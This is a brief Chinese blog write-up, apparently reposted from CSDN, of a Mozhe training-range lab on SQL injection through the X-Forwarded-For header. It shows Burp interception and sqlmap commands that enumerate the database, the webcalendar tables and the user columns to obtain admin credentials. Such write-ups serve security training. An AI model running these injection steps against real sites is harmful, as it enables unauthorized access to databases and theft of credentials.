墨者靶场-X-Forwarded-For注入漏洞实战

墨者靶场-X-Forwarded-For注入漏洞实战

打开靶场出现后台管理登录界面,随便输入一个用户名密码
利用Burp进行拦截抓包
在这里插入图片描述
在XFF字段的后面加上*,复制数据包到本地并保存为1.txt文档
放入到Sqlmap中进行自动化探测
爆破数据库

sqlmap.py -r 1.txt --dbs --batch

在这里插入图片描述
爆破表

sqlmap.py -r 1.txt -D webcalendar --tables --batch

在这里插入图片描述
爆破字段

sqlmap.py -r 1.txt -D webcalendar -T user --columns --batch

在这里插入图片描述
爆破字段内容
在这里插入图片描述
登陆后台即可拿到key

猜你喜欢

转载自blog.csdn.net/qq_43590351/article/details/112774170